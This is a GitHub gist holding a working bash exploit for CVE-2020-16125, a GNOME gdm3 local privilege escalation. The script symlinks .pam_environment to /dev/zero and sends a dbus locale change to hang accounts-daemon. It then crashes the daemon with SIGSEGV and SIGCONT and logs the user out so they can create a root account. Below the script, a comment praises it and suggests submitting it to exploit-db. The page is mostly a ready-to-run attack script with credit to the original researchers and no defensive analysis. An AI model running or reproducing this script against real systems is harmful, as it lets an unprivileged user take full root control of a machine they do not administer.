Skip to content

Instantly share code, notes, and snippets.

Last active June 14, 2021 14:17
What would you like to do?
Quick script to automate CVE-2020-16125 Gnome gdm3 privilege escalation. Credit for discovery to Kevin Backhouse and GitHub Security Lab. Original writeup:
# Credit to Kevin Backhouse and GitHub Security Lab, I just scripted this...
# Original writeup:
# CVE-2020-16125
echo "[+] Creating symlink"
ln -s /dev/zero .pam_environment;
echo "[+] Changing region"
(dbus-send --print-reply --system --dest=org.freedesktop.Accounts /org/freedesktop/Accounts/User$UID org.freedesktop.Accounts.User.SetFormatsLocale string:'en_GB.UTF-8')&
echo "[+] Removing symlink"
rm .pam_environment
ACCOUNTS_DAEMON_PID=`pidof accounts-daemon`
echo "[+] Killing accounts-daemon PID: $ACCOUNTS_DAEMON_PID"
(nohup bash -c "sleep 3s; kill -SIGSEGV $ACCOUNTS_DAEMON_PID; kill -SIGCONT $ACCOUNTS_DAEMON_PID")&
echo "[+] Logging out so you can become root"
sleep 1
gnome-session-quit --logout --no-prompt
Copy link

Why don't you submit this to exploit-db, it's a pretty good script 👍

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment